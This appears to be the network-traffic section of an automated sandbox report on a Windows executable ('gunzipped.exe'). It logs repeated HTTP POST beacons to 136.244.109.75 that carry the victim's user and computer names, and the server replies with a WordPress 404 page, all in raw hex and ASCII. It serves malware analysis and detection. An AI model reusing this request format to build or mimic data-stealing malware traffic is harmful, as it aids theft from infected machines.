                          Apr 17, 2024 03:18:53.710702896 CEST4979380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:53.715018034 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:53.923048019 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:53.923162937 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:53.924912930 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:54.133012056 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:54.136291027 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:54.344399929 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.068927050 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.068984985 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069022894 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069061041 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069101095 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069133043 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.069133043 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.069139004 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069179058 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069189072 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.069219112 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069256067 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069295883 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.069312096 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.069340944 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.277491093 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.277523994 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.277571917 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.284897089 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.284951925 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.285053968 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.299712896 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.299777031 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.299827099 CEST4979480192.168.2.5136.244.109.75
                          Apr 17, 2024 03:18:55.314048052 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.314090014 CEST8049794136.244.109.75192.168.2.5
                          Apr 17, 2024 03:18:55.314147949 CEST4979480192.168.2.5136.244.109.75
                          • 136.244.109.75
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549705136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:50.877994061 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 180
                          Connection: close
                          Apr 17, 2024 03:16:51.081429005 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: 'ckav.rualfons936905ALFONS-PCk0FDD42EE188E931437F4FBE2CiK1ov
                          Apr 17, 2024 03:16:52.016489029 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:50 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:52.016509056 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:52.016521931 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:52.016536951 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:52.016551971 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:52.016565084 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:52.016578913 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:52.016592979 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:52.016608000 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:52.016623020 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.549706136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:16:52.374211073 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 180
                          Connection: close
                          Apr 17, 2024 03:16:52.578356028 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: 'ckav.rualfons936905ALFONS-PC+0FDD42EE188E931437F4FBE2CT2tU2
                          Apr 17, 2024 03:16:53.501743078 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:16:52 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:16:53.501759052 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:16:53.501770973 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:16:53.501782894 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:16:53.501853943 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:16:53.501866102 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:16:53.501877069 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:16:53.501888990 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:16:53.501900911 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:16:53.501916885 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
